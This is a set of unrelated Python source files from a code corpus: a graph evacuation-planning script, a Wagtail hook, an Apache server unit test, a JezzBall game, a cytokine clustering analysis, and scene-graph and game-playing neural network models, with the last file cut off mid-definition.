the-stack_106_24277
# 1 # Usate l'algoritmo CCRP per trovare un piano di evacuazione nel grafo della Città di San Francisco. # # I nodi sorgente del piano sono i tre ingressi autostradali della città: # - nodo 3718987342 (Golden Gate Bridge) # - nodo 915248218 (Oakland Bay Bridge) # - nodo 65286004 (James Lick Freeway) # # I nodi destinazione corrispondono a sei ospedali cittadini: # - nodo 261510687 (San Francisco General Hospital) # - nodo 3522821903 (UC Medical Center) # - nodo 65319958 (Saint Francis Memorial Hospital) # - nodo 65325408 (Saint Mary's Medical Center) # - nodo 65295403 (CPMP California Campus) # - nodo 258913493 (Kaiser-Permanente Medical Center) # # Mostrate l'andamento dell'algoritmo in un grafico a linee dove l'asse x corrisponde alle capacità e l'asse y al tempo # di percorrenza. Il grafico deve mostrare come cresce la capacità ed il tempo di percorrenza al crescere del numero di # percorsi inseriti nel piano dall'algoritmo. from math import inf from matplotlib import pyplot as plt from LibGraph.PIMapDirectGraph import PIMapDirectGraph input_file = open("SFroad.txt", "r") for _ in range(1): input_file.readline() g = PIMapDirectGraph() speed_limits = [30, 50, 50, 70, 70, 90] capacity_limits = [500, 750, 1000, 1500, 2000, 4000] source_nodes = {3718987342, 915248218, 65286004} destination_nodes = {261510687, 3522821903, 65319958, 65325408, 65295403, 258913493} i = 1 for line in input_file: (a, b, c, d) = line.split() a = int(a) b = int(b) c = float(c) d = int(d) if a != b: try: g.add_arch(a, b, c / speed_limits[d - 1], capacity_limits[d - 1]) except KeyError: pass print("Number of nodes:", len(g.get_node_list())) print("Number of edges:", len(g.get_arch_list())) plan = g.ccrp(source_nodes, destination_nodes) print(plan) print("Number of paths:", len(plan)) # Calculate total capacity of the plan plan_capacity = sum(c for p, c, t in plan) # Calculate travel time of the plan _, _, plan_time = plan[-1] print("Plan capacity:", plan_capacity) print("Plan time:", plan_time) capacities = [0] for p, c, t in plan: capacities.append(c + capacities[-1]) capacities = capacities[1:] plt.title("Piano d'Evaquazione") plt.xlabel("Capacità totale") plt.ylabel("Tempo di percorrenza del Piano") plt.plot(capacities, [t for p, c, t in plan], "b") plt.show() # 2 Qual'è la capacità massima di veicoli che possono entrare in città dai tre nodi sorgente? Qual'è la capacità # massima di veicoli che possono giungere contemporaneamente ai sei ospedali di destinazione? Confrontate questi due # valori con la capacità massima del piano che avete trovato con CCRP: dove si trova il collo di bottiglia? print("Source nodes capacity", sum(g.get_capacity(a, b) for a in source_nodes for b in g.get_out_adj_list(a))) print("Destination nodes capacity", sum(g.get_capacity(a, b) for b in destination_nodes for a in g.get_in_adj_list(b))) bottlenecks = list() for p, c, t in plan: bot = inf global res for i in range(len(p) - 1): if bot > g.get_capacity(p[i], p[i + 1]): bot = g.get_capacity(p[i], p[i + 1]) res = (p[i], p[i + 1]) bottlenecks.append((res, bot)) print("Bottlenecks:", bottlenecks) # 3 # # Spiegate brevemente come avete implementato la coda di priorità nell'algoritmo di Dijkstra per la ricerca dei # cammini minimi. Qual'è la complessità delle operazioni di base della vostra implementazione: creazione della coda, # estrazione del minimo e decremento della chiave? print("FINE")
the-stack_106_24282
from django.utils.html import format_html_join from django.conf import settings from wagtail.core import hooks @hooks.register("insert_editor_js") def editor_js(): js_files = ["js/realtime_preview.js"] return format_html_join( "\n", '<script src="{0}{1}"></script>', ((settings.STATIC_URL, filename) for filename in js_files), )
the-stack_106_24283
# Copyright (C) 2012 Google Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import sys import unittest from blinkpy.common.system.executive_mock import MockExecutive from blinkpy.common.system.output_capture import OutputCapture from blinkpy.common.host_mock import MockHost from blinkpy.web_tests.port import test from blinkpy.web_tests.servers.apache_http import ApacheHTTP class TestApacheHTTP(unittest.TestCase): def test_start_cmd(self): # Fails on win - see https://bugs.webkit.org/show_bug.cgi?id=84726 if sys.platform == 'win32': return def fake_pid(_): host.filesystem.write_text_file('/tmp/WebKit/httpd.pid', '42') return True host = MockHost() host.executive = MockExecutive(should_log=True) test_port = test.TestPort(host) host.filesystem.write_text_file(test_port.path_to_apache_config_file(), '') output_dir = '/mock/output_dir' host.filesystem.maybe_make_directory(output_dir) host.filesystem.maybe_make_directory( '/mock-checkout/out/Release/gen/third_party/devtools-frontend/src/front_end' ) host.filesystem.maybe_make_directory('/mock-checkout/out/Release/gen') server = ApacheHTTP( test_port, output_dir, additional_dirs=[], number_of_servers=4) server._check_that_all_ports_are_available = lambda: True server._is_server_running_on_all_ports = lambda: True server._wait_for_action = fake_pid oc = OutputCapture() try: oc.capture_output() server.start() server.stop() finally: _, _, logs = oc.restore_output() self.assertIn('StartServers 4', logs) self.assertIn('MinSpareServers 4', logs) self.assertIn('MaxSpareServers 4', logs)
the-stack_106_24285
from . base import BaseGame from .. import colors from .. util import srange from random import randint, choice from time import time from .. import font clist = [ colors.Off, colors.Red, colors.Green ] OPEN = 0 FENCE = 1 CLOSED = 2 class Ball(): def __init__(self): self.x = randint(0, 15) self.y = randint(0, 15) self.x_dir = choice([-1, 1]) self.y_dir = choice([-1, 1]) class Field: def __init__(self): self.reset() def reset(self): self.matrix = [[0 for x in range(16)] for y in range(16)] self._reset_visited() def _reset_visited(self): self.__visited = [[False for x in range(16)] for y in range(16)] def print(self): for row in self.matrix: print(row) def get(self, x, y): return self.matrix[y][x] def set(self, x, y, v): self.matrix[y][x] = v def add_fence(self, a, b, balls): xa, ya = a xb, yb = b balls = [(b.x, b.y) for b in balls] if xa == xb: for y in srange(ya, yb): if not (xa, y) in balls: if self.get(xa, y) == OPEN: self.set(xa, y, 1) else: break elif ya == yb: for x in srange(xa, xb): if not (x, ya) in balls: if self.get(x, ya) == OPEN: self.set(x, ya, 1) else: break else: return False return True def _find_group(self, x, y): if self.get(x, y) != OPEN: self.__visited[y][x] = True if self.__visited[y][x]: return [] res = [(x, y)] self.__visited[y][x] = True val = self.get(x, y) if x < 15 and self.get(x + 1, y) == val: res.extend(self._find_group(x + 1, y)) if x > 0 and self.get(x - 1, y) == val: res.extend(self._find_group(x - 1, y)) if y < 15 and self.get(x, y + 1) == val: res.extend(self._find_group(x, y + 1)) if y > 0 and self.get(x, y - 1) == val: res.extend(self._find_group(x, y - 1)) return res def find_groups(self): self._reset_visited() groups = [] for x in range(16): for y in range(16): group = self._find_group(x, y) if len(group) >= 1: group = sorted(group, key=lambda coords: coords[1]) groups.append(group) return groups def percent_open(self): c = 0 for x in range(16): for y in range(16): if self.get(x, y) == OPEN: c += 1 return c / 256 class JezzBall(BaseGame): def setup(self, frames_per_step=5): self.frames_per_step = frames_per_step def reset(self, balls=1): self.win = False self.win_step = 0 self.field = Field() self.balls = [] for _ in range(balls): self.balls.append(Ball()) self._step = 0 def frame(self): self.matrix.clear() if self.win: for x in range(self.win_step): self.matrix.drawLine(x, 0, x, 15, colors.Red) self.matrix.drawText('LVL', x=2, y=0, color=colors.Blue) lvl = '{}'.format(len(self.balls)) w, h = font.str_dim(lvl) x = (16 - w) // 2 self.matrix.drawText(lvl, x=x, y=8, color=colors.Blue) if self._step % 5 == 0: self.win_step += 1 if self.win_step >= 18: self.win = False else: for y in range(16): for x in range(16): self.matrix.set(x, y, clist[self.field.get(x, y)]) # c = colors.hue2rgb((self._step * 2) % 256) c = colors.Blue for b in self.balls: self.matrix.set(b.x, b.y, c) pressed = self.buttons.pressed() if len(pressed) >= 2: if self.field.add_fence(pressed[0], pressed[1], self.balls): groups = self.field.find_groups() for g in groups: close = True for b in self.balls: if (b.x, b.y) in g: close = False break if close: for x, y in g: self.field.set(x, y, CLOSED) if self._step % self.frames_per_step == 0: for b in self.balls: x_dir = b.x_dir y_dir = b.y_dir if b.x == 0: b.x_dir = 1 elif b.x == 15: b.x_dir = -1 elif b.x_dir == 1 and self.field.get(b.x + 1, b.y) != OPEN: b.x_dir = -1 elif b.x_dir == -1 and self.field.get(b.x - 1, b.y) != OPEN: b.x_dir = 1 if b.y == 0: b.y_dir = 1 elif b.y == 15: b.y_dir = -1 elif b.y_dir == 1 and self.field.get(b.x, b.y + 1) != OPEN: b.y_dir = -1 elif b.y_dir == -1 and self.field.get(b.x, b.y - 1) != OPEN: b.y_dir = 1 if (b.x_dir == x_dir and b.y_dir == y_dir) and (b.x != 0 and b.x != 15 and b.y != 0 and b.y != 15): if self.field.get(b.x + b.x_dir, b.y + b.y_dir) != OPEN: b.x_dir *= -1 b.y_dir *= -1 b.x += b.x_dir b.y += b.y_dir if self.field.percent_open() <= 0.10: self.reset(balls=len(self.balls) + 1) self.win = True self._step += 1
the-stack_106_24286
import pandas as pd from scipy.cluster import hierarchy from matplotlib import pyplot as plt import seaborn as sns cyt_list = 'IL1B,IL2,IL4,IL5,IL6,IL7,CXCL8,IL10,IL12B,IL13,IL17A,CSF3,CSF2,IFNG,CCL2,CCL4,TNF,IL1RN,IL9,IL15,CCL11,FGF2,CXCL10,PDGFB,CCL5,VEGFA,CCL3'.split(',') #getting df from csv with pre-PL therapy infos df = pd.read_excel('../database/db.xlsx', sheet_name = 'SM NM', usecols = 'A,F:AF,CB,DD') df.columns = ('patient_id,IL1B,IL2,IL4,IL5,IL6,IL7,CXCL8,IL10,IL12B,IL13,IL17A,CSF3,CSF2,IFNG,CCL2,CCL4,TNF,IL1RN,IL9,IL15,CCL11,FGF2,CXCL10,PDGFB,CCL5,VEGFA,CCL3,class_int,cort_therapy').split(',') #This lines were useless, keeping them here fo precaution's sake #replacing NaN values with 1 (no therapy) #df['cort_therapy'].fillna(1, inplace = True) #creating sub-dfs for each class (no therapy before pl) df_ctrl = df[(df['class_int'] == 6)] df_ctrl_filled = df_ctrl.fillna({'cort_therapy' : 1}) df_ctrl_noc = df_ctrl_filled[df_ctrl_filled['cort_therapy'] == 1].dropna() df_pp = df[(df['class_int'] == 5)] df_pp_filled = df_pp.fillna({'cort_therapy' : 1}) df_pp_noc = df_pp_filled[df_pp_filled['cort_therapy'] == 1].dropna() df_sp = df[(df['class_int'] == 4)] df_sp_filled = df_sp.fillna({'cort_therapy' : 1}) df_sp_noc = df_sp_filled[df_sp_filled['cort_therapy'] == 1].dropna() df_rr = df[(df['class_int'] == 3)] df_rr_filled = df_rr.fillna({'cort_therapy' : 1}) df_rr_noc = df_rr_filled[df_rr_filled['cort_therapy'] == 1].dropna() with open('./data/rr_noc_list.txt', 'w') as f: lista_rr = list(df_rr_noc['patient_id'].astype(str)) f.write(','.join(lista_rr)) print('######################################CONTROLLO######################################') print(df_ctrl_noc) #138 print('######################################PP######################################') print(df_pp_noc) #44 print('######################################SP######################################') print(df_sp_noc) #16 print('######################################RR######################################') print(df_rr_noc) #230 #dropping cortisonic therapy from df as it is useless now ctrl_df = df_ctrl_noc.drop(columns = 'cort_therapy') pp_df = df_pp_noc.drop(columns = 'cort_therapy') sp_df = df_sp_noc.drop(columns = 'cort_therapy') rr_df = df_rr_noc.drop(columns = 'cort_therapy') #defining thresholds for low, normal and high level for each cytokine thres = [] #based on quartiles for cyt in cyt_list: thres.append((ctrl_df[cyt].astype(float).quantile(0.25), ctrl_df[cyt].astype(float).quantile(0.75))) #associating the threshold values to each cytokine using a dictionary cyt_thres = dict(zip(cyt_list, thres)) for key in cyt_thres: print('{} - {}'.format(key, cyt_thres[key])) #for each class: #setting low values to -1 #normal values to 0 #high values to 1 pp_values = [] for cyt in cyt_list: arr = list(pp_df[cyt].astype(float)) to_push = [] for entry in arr: if entry < cyt_thres[cyt][0]: entry = -1 elif entry > cyt_thres[cyt][1]: entry = 1 else: entry = 0 to_push.append(entry) pp_values.append(to_push) pp_toclust = pd.DataFrame(pp_values).transpose() pp_toclust.index = list(pp_df['patient_id']) pp_toclust.columns = cyt_list sp_values = [] for cyt in cyt_list: arr = list(sp_df[cyt].astype(float)) to_push = [] for entry in arr: if entry < cyt_thres[cyt][0]: entry = -1 elif entry > cyt_thres[cyt][1]: entry = 1 else: entry = 0 to_push.append(entry) sp_values.append(to_push) sp_toclust = pd.DataFrame(sp_values).transpose() sp_toclust.index = list(sp_df['patient_id']) sp_toclust.columns = cyt_list rr_values = [] for cyt in cyt_list: arr = list(rr_df[cyt].astype(float)) to_push = [] for entry in arr: if entry < cyt_thres[cyt][0]: entry = -1 elif entry > cyt_thres[cyt][1]: entry = 1 else: entry = 0 to_push.append(entry) rr_values.append(to_push) rr_toclust = pd.DataFrame(rr_values).transpose() rr_toclust.index = list(rr_df['patient_id']) rr_toclust.columns = cyt_list print(len(rr_toclust)) ##############################################Recursively removing groups################################################## with open('./data/cluster_groups/ward_groups.txt', 'r') as f: groups = [] for line in f: groups.append(line.strip().split(',')) cyt_ord = 'TNF,IL13,IL9,IL1B,IL7,IL4,VEGFA,IL10,CCL11,IL2,IL12B,IL15,PDGFB,IL6,IL17A,CSF2,FGF2,CCL4,CCL3,IFNG,CCL2,CXCL8,CXCL10,IL5,IL1RN,CSF3,CCL5'.split(',') rr_forced = pd.DataFrame() for cyt in cyt_ord: rr_forced[cyt] = rr_toclust[cyt] rr_forced.index = rr_toclust.index clean_groups = [] for group in groups: a = [int(x) for x in group] clean_groups.append(a) clean_groups.pop() i = 1 for group in clean_groups: rr_forced.drop(group, axis = 0, inplace = True) cluster_row = hierarchy.linkage(rr_forced, method="ward", metric="euclidean") clusterfig = sns.clustermap(rr_forced, row_linkage = cluster_row, col_cluster = False, yticklabels = True, figsize = (10, len(rr_forced)/4)) index_row = clusterfig.dendrogram_row.reordered_ind plt.title('RR Clustering') plt.savefig('../plots/remove_clusters/rr_forced_ward_noG{}.png'.format(i), dpi = 300) plt.clf() cluster_row = hierarchy.linkage(rr_forced, method="ward", metric="euclidean") clusterfig = sns.clustermap(rr_forced, row_linkage = cluster_row, col_cluster = False) index_row = clusterfig.dendrogram_row.reordered_ind plt.title('RR Clustering') plt.savefig('../plots/remove_clusters/small_rr_forced_ward_noG{}.png'.format(i), dpi = 300) plt.clf() i +=1
the-stack_106_24287
""" KERN models """ import numpy as np import torch import torch.nn as nn import torch.nn.parallel from torch.autograd import Variable from torch.nn import functional as F from torch.nn.utils.rnn import PackedSequence from lib.resnet import resnet_l4 from config import BATCHNORM_MOMENTUM from lib.fpn.nms.functions.nms import apply_nms from lib.fpn.box_utils import bbox_overlaps, center_size from lib.get_union_boxes import UnionBoxesAndFeats from lib.fpn.proposal_assignments.rel_assignments import rel_assignments from lib.object_detector import ObjectDetector, gather_res, load_vgg from lib.pytorch_misc import transpose_packed_sequence_inds, to_onehot, arange, enumerate_by_image, diagonal_inds, Flattener from lib.surgery import filter_dets from lib.fpn.roi_align.functions.roi_align import RoIAlignFunction from lib.ggnn import GGNNObj, GGNNRel MODES = ('sgdet', 'sgcls', 'predcls') class GGNNObjReason(nn.Module): """ Module for object classification """ def __init__(self, mode='sgdet', num_obj_cls=151, obj_dim=4096, time_step_num=3, hidden_dim=512, output_dim=512, use_knowledge=True, knowledge_matrix=''): super(GGNNObjReason, self).__init__() assert mode in MODES self.mode = mode self.num_obj_cls = num_obj_cls self.obj_proj = nn.Linear(obj_dim, hidden_dim) self.ggnn_obj = GGNNObj(num_obj_cls=num_obj_cls, time_step_num=time_step_num, hidden_dim=hidden_dim, output_dim=output_dim, use_knowledge=use_knowledge, prior_matrix=knowledge_matrix) def forward(self, im_inds, obj_fmaps, obj_labels): """ Reason object classes using knowledge of object cooccurrence """ if self.mode == 'predcls': # in task 'predcls', there is no need to run GGNN_obj obj_dists = Variable(to_onehot(obj_labels.data, self.num_obj_cls)) return obj_dists else: input_ggnn = self.obj_proj(obj_fmaps) lengths = [] for i, s, e in enumerate_by_image(im_inds.data): lengths.append(e - s) obj_cum_add = np.cumsum([0] + lengths) obj_dists = torch.cat([self.ggnn_obj(input_ggnn[obj_cum_add[i] : obj_cum_add[i+1]]) for i in range(len(lengths))], 0) return obj_dists class GGNNRelReason(nn.Module): """ Module for relationship classification. """ def __init__(self, mode='sgdet', num_obj_cls=151, num_rel_cls=51, obj_dim=4096, rel_dim=4096, time_step_num=3, hidden_dim=512, output_dim=512, use_knowledge=True, knowledge_matrix=''): super(GGNNRelReason, self).__init__() assert mode in MODES self.mode = mode self.num_obj_cls = num_obj_cls self.num_rel_cls = num_rel_cls self.obj_dim = obj_dim self.rel_dim = rel_dim self.obj_proj = nn.Linear(self.obj_dim, hidden_dim) self.rel_proj = nn.Linear(self.rel_dim, hidden_dim) self.ggnn_rel = GGNNRel(num_rel_cls=num_rel_cls, time_step_num=time_step_num, hidden_dim=hidden_dim, output_dim=output_dim, use_knowledge=use_knowledge, prior_matrix=knowledge_matrix) def forward(self, obj_fmaps, obj_logits, rel_inds, vr, obj_labels=None, boxes_per_cls=None): """ Reason relationship classes using knowledge of object and relationship coccurrence. """ # print(rel_inds.shape) # (num_rel, 3) if self.mode == 'predcls': obj_dists2 = Variable(to_onehot(obj_labels.data, self.num_obj_cls)) else: obj_dists2 = obj_logits if self.mode == 'sgdet' and not self.training: # NMS here for baseline probs = F.softmax(obj_dists2, 1) nms_mask = obj_dists2.data.clone() nms_mask.zero_() for c_i in range(1, obj_dists2.size(1)): scores_ci = probs.data[:, c_i] boxes_ci = boxes_per_cls.data[:, c_i] keep = apply_nms(scores_ci, boxes_ci, pre_nms_topn=scores_ci.size(0), post_nms_topn=scores_ci.size(0), nms_thresh=0.3) nms_mask[:, c_i][keep] = 1 obj_preds = Variable(nms_mask * probs.data, volatile=True)[:,1:].max(1)[1] + 1 else: obj_preds = obj_labels if obj_labels is not None else obj_dists2[:,1:].max(1)[1] + 1 sub_obj_preds = torch.cat((obj_preds[rel_inds[:, 1]].view(-1, 1), obj_preds[rel_inds[:, 2]].view(-1, 1)), 1) obj_fmaps = self.obj_proj(obj_fmaps) vr = self.rel_proj(vr) input_ggnn = torch.stack([torch.cat([obj_fmaps[rel_ind[1]].unsqueeze(0), obj_fmaps[rel_ind[2]].unsqueeze(0), vr[index].repeat(self.num_rel_cls, 1)], 0) for index, rel_ind in enumerate(rel_inds)]) rel_dists = self.ggnn_rel(rel_inds[:, 1:], sub_obj_preds, input_ggnn) return obj_dists2, obj_preds, rel_dists class VRFC(nn.Module): """ Module for relationship classification just using a fully connected layer. """ def __init__(self, mode, rel_dim, num_obj_cls, num_rel_cls): super(VRFC, self).__init__() self.mode = mode self.rel_dim = rel_dim self.num_obj_cls = num_obj_cls self.num_rel_cls = num_rel_cls self.vr_fc = nn.Linear(self.rel_dim, self.num_rel_cls) def forward(self, obj_logits, vr, obj_labels=None, boxes_per_cls=None): if self.mode == 'predcls': obj_dists2 = Variable(to_onehot(obj_labels.data, self.num_obj_cls)) else: obj_dists2 = obj_logits if self.mode == 'sgdet' and not self.training: # NMS here for baseline probs = F.softmax(obj_dists2, 1) nms_mask = obj_dists2.data.clone() nms_mask.zero_() for c_i in range(1, obj_dists2.size(1)): scores_ci = probs.data[:, c_i] boxes_ci = boxes_per_cls.data[:, c_i] keep = apply_nms(scores_ci, boxes_ci, pre_nms_topn=scores_ci.size(0), post_nms_topn=scores_ci.size(0), nms_thresh=0.3) nms_mask[:, c_i][keep] = 1 obj_preds = Variable(nms_mask * probs.data, volatile=True)[:,1:].max(1)[1] + 1 else: obj_preds = obj_labels if obj_labels is not None else obj_dists2[:,1:].max(1)[1] + 1 rel_dists = self.vr_fc(vr) return obj_dists2, obj_preds, rel_dists class KERN(nn.Module): """ Knowledge-Embedded Routing Network """ def __init__(self, classes, rel_classes, mode='sgdet', num_gpus=1, require_overlap_det=True, pooling_dim=4096, use_resnet=False, thresh=0.01, use_proposals=False, use_ggnn_obj=False, ggnn_obj_time_step_num=3, ggnn_obj_hidden_dim=512, ggnn_obj_output_dim=512, use_ggnn_rel=False, ggnn_rel_time_step_num=3, ggnn_rel_hidden_dim=512, ggnn_rel_output_dim=512, use_obj_knowledge=True, use_rel_knowledge=True, obj_knowledge='', rel_knowledge=''): """ :param classes: Object classes :param rel_classes: Relationship classes. None if were not using rel mode :param mode: (sgcls, predcls, or sgdet) :param num_gpus: how many GPUS 2 use :param require_overlap_det: Whether two objects must intersect """ super(KERN, self).__init__() self.classes = classes self.rel_classes = rel_classes self.num_gpus = num_gpus assert mode in MODES self.mode = mode self.pooling_size = 7 self.obj_dim = 2048 if use_resnet else 4096 self.rel_dim = self.obj_dim self.pooling_dim = pooling_dim self.use_ggnn_obj=use_ggnn_obj self.use_ggnn_rel = use_ggnn_rel self.require_overlap = require_overlap_det and self.mode == 'sgdet' self.detector = ObjectDetector( classes=classes, mode=('proposals' if use_proposals else 'refinerels') if mode == 'sgdet' else 'gtbox', use_resnet=use_resnet, thresh=thresh, max_per_img=64 ) self.union_boxes = UnionBoxesAndFeats(pooling_size=self.pooling_size, stride=16, dim=1024 if use_resnet else 512) if use_resnet: self.roi_fmap = nn.Sequential( resnet_l4(relu_end=False), nn.AvgPool2d(self.pooling_size), Flattener(), ) else: roi_fmap = [ Flattener(), load_vgg(use_dropout=False, use_relu=False, use_linear=pooling_dim == 4096, pretrained=False).classifier, ] if pooling_dim != 4096: roi_fmap.append(nn.Linear(4096, pooling_dim)) self.roi_fmap = nn.Sequential(*roi_fmap) self.roi_fmap_obj = load_vgg(pretrained=False).classifier if self.use_ggnn_obj: self.ggnn_obj_reason = GGNNObjReason(mode=self.mode, num_obj_cls=len(self.classes), obj_dim=self.obj_dim, time_step_num=ggnn_obj_time_step_num, hidden_dim=ggnn_obj_hidden_dim, output_dim=ggnn_obj_output_dim, use_knowledge=use_obj_knowledge, knowledge_matrix=obj_knowledge) if self.use_ggnn_rel: self.ggnn_rel_reason = GGNNRelReason(mode=self.mode, num_obj_cls=len(self.classes), num_rel_cls=len(rel_classes), obj_dim=self.obj_dim, rel_dim=self.rel_dim, time_step_num=ggnn_rel_time_step_num, hidden_dim=ggnn_rel_hidden_dim, output_dim=ggnn_obj_output_dim, use_knowledge=use_rel_knowledge, knowledge_matrix=rel_knowledge) else: self.vr_fc_cls = VRFC(self.mode, self.rel_dim, len(self.classes), len(self.rel_classes)) @property def num_classes(self): return len(self.classes) @property def num_rels(self): return len(self.rel_classes) def visual_rep(self, features, rois, pair_inds): """ Classify the features :param features: [batch_size, dim, IM_SIZE/4, IM_SIZE/4] :param rois: [num_rois, 5] array of [img_num, x0, y0, x1, y1]. :param pair_inds inds to use when predicting :return: score_pred, a [num_rois, num_classes] array box_pred, a [num_rois, num_classes, 4] array """ assert pair_inds.size(1) == 2 uboxes = self.union_boxes(features, rois, pair_inds) return self.roi_fmap(uboxes) def get_rel_inds(self, rel_labels, im_inds, box_priors): # Get the relationship candidates if self.training: rel_inds = rel_labels[:, :3].data.clone() else: rel_cands = im_inds.data[:, None] == im_inds.data[None] rel_cands.view(-1)[diagonal_inds(rel_cands)] = 0 if self.require_overlap: rel_cands = rel_cands & (bbox_overlaps(box_priors.data, box_priors.data) > 0) # if there are fewer then 100 things then we might as well add some? amt_to_add = 100 - rel_cands.long().sum() rel_cands = rel_cands.nonzero() if rel_cands.dim() == 0: rel_cands = im_inds.data.new(1, 2).fill_(0) rel_inds = torch.cat((im_inds.data[rel_cands[:, 0]][:, None], rel_cands), 1) return rel_inds def obj_feature_map(self, features, rois): """ Gets the ROI features :param features: [batch_size, dim, IM_SIZE/4, IM_SIZE/4] (features at level p2) :param rois: [num_rois, 5] array of [img_num, x0, y0, x1, y1]. :return: [num_rois, #dim] array """ feature_pool = RoIAlignFunction(self.pooling_size, self.pooling_size, spatial_scale=1 / 16)( features, rois) return self.roi_fmap_obj(feature_pool.view(rois.size(0), -1)) def forward(self, x, im_sizes, image_offset, gt_boxes=None, gt_classes=None, gt_rels=None, proposals=None, train_anchor_inds=None, return_fmap=False): """ Forward pass for detection :param x: Images@[batch_size, 3, IM_SIZE, IM_SIZE] :param im_sizes: A numpy array of (h, w, scale) for each image. :param image_offset: Offset onto what image we're on for MGPU training (if single GPU this is 0) :param gt_boxes: Training parameters: :param gt_boxes: [num_gt, 4] GT boxes over the batch. :param gt_classes: [num_gt, 2] gt boxes where each one is (img_id, class) :param train_anchor_inds: a [num_train, 2] array of indices for the anchors that will be used to compute the training loss. Each (img_ind, fpn_idx) :return: If train: scores, boxdeltas, labels, boxes, boxtargets, rpnscores, rpnboxes, rellabels if test: prob dists, boxes, img inds, maxscores, classes """ result = self.detector(x, im_sizes, image_offset, gt_boxes, gt_classes, gt_rels, proposals, train_anchor_inds, return_fmap=True) if result.is_none(): return ValueError("heck") im_inds = result.im_inds - image_offset boxes = result.rm_box_priors if self.training and result.rel_labels is None: assert self.mode == 'sgdet' result.rel_labels = rel_assignments(im_inds.data, boxes.data, result.rm_obj_labels.data, gt_boxes.data, gt_classes.data, gt_rels.data, image_offset, filter_non_overlap=True, num_sample_per_gt=1) rel_inds = self.get_rel_inds(result.rel_labels, im_inds, boxes) rois = torch.cat((im_inds[:, None].float(), boxes), 1) result.obj_fmap = self.obj_feature_map(result.fmap.detach(), rois) if self.use_ggnn_obj: result.rm_obj_dists = self.ggnn_obj_reason(im_inds, result.obj_fmap, result.rm_obj_labels if self.training or self.mode == 'predcls' else None) vr = self.visual_rep(result.fmap.detach(), rois, rel_inds[:, 1:]) if self.use_ggnn_rel: result.rm_obj_dists, result.obj_preds, result.rel_dists = self.ggnn_rel_reason( obj_fmaps=result.obj_fmap, obj_logits=result.rm_obj_dists, vr=vr, rel_inds=rel_inds, obj_labels=result.rm_obj_labels if self.training or self.mode == 'predcls' else None, boxes_per_cls=result.boxes_all ) else: result.rm_obj_dists, result.obj_preds, result.rel_dists = self.vr_fc_cls( obj_logits=result.rm_obj_dists, vr=vr, obj_labels=result.rm_obj_labels if self.training or self.mode == 'predcls' else None, boxes_per_cls=result.boxes_all) if self.training: return result twod_inds = arange(result.obj_preds.data) * self.num_classes + result.obj_preds.data result.obj_scores = F.softmax(result.rm_obj_dists, dim=1).view(-1)[twod_inds] # Bbox regression if self.mode == 'sgdet': bboxes = result.boxes_all.view(-1, 4)[twod_inds].view(result.boxes_all.size(0), 4) else: # Boxes will get fixed by filter_dets function. bboxes = result.rm_box_priors rel_rep = F.softmax(result.rel_dists, dim=1) return filter_dets(bboxes, result.obj_scores, result.obj_preds, rel_inds[:, 1:], rel_rep) def __getitem__(self, batch): """ Hack to do multi-GPU training""" batch.scatter() if self.num_gpus == 1: return self(*batch[0]) replicas = nn.parallel.replicate(self, devices=list(range(self.num_gpus))) outputs = nn.parallel.parallel_apply(replicas, [batch[i] for i in range(self.num_gpus)]) if self.training: return gather_res(outputs, 0, dim=0) return outputs
the-stack_106_24289
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import torch from torch import nn import torch.nn.functional as F from . import utils as zutils from ..params import GameParams, ModelParams from .. import utils @zutils.register_model class DeepConvConvLogitModel(torch.jit.ScriptModule): __constants__ = ["c_prime", "h_prime", "w_prime", "mono", "conv_nets"] DEFAULT_NB_NETS = 13 DEFAULT_NNSIZE = 2 DEFAULT_NNKS = 3 DEFAULT_STRIDE = 1 DEFAULT_DILATION = 1 DEFAULT_POOLING = False DEFAULT_BN = False # DEFAULT_BN_AFFINE = False default_game_name = "Hex13" def __init__(self, game_params: GameParams, model_params: ModelParams): torch.jit.ScriptModule.__init__(self) if game_params.game_name is None: game_params.game_name = self.__class__.default_game_name self.game_name = game_params.game_name self.game_params = game_params info = zutils.get_game_info(game_params) c, h, w = self.c, self.h, self.w = info["feature_size"][:3] c_prime, h_prime, w_prime = self.c_prime, self.h_prime, self.w_prime = info[ "action_size" ][:3] if h_prime != h or w_prime != w: raise RuntimeError( f'The game "{self.game_name}" is not eligible to a conv-computed logit ' f'model such as "{self.__class__.__name__}" - try with ' f'"{self.__class__.__name__.replace("ConvLogit", "FCLogit")}" instead' ) # nb identical hidden layers (first layer excepted) if model_params.nb_nets is None: model_params.nb_nets = self.DEFAULT_NB_NETS nb_nets = model_params.nb_nets # nn size if model_params.nnsize is None: model_params.nnsize = self.DEFAULT_NNSIZE nnsize = model_params.nnsize # kernel size if model_params.nnks is None: model_params.nnks = self.DEFAULT_NNKS nnks = model_params.nnks # stride stride = self.DEFAULT_STRIDE # dilation dilation = self.DEFAULT_DILATION # padding padding = zutils.get_consistent_padding_from_nnks(nnks=nnks, dilation=dilation) # pooling if model_params.pooling is None: model_params.pooling = self.DEFAULT_POOLING pooling = model_params.pooling # batch norm if model_params.bn is None: model_params.bn = self.DEFAULT_BN bn = model_params.bn # # batch norm affine # if model_params.bn_affine is None: # 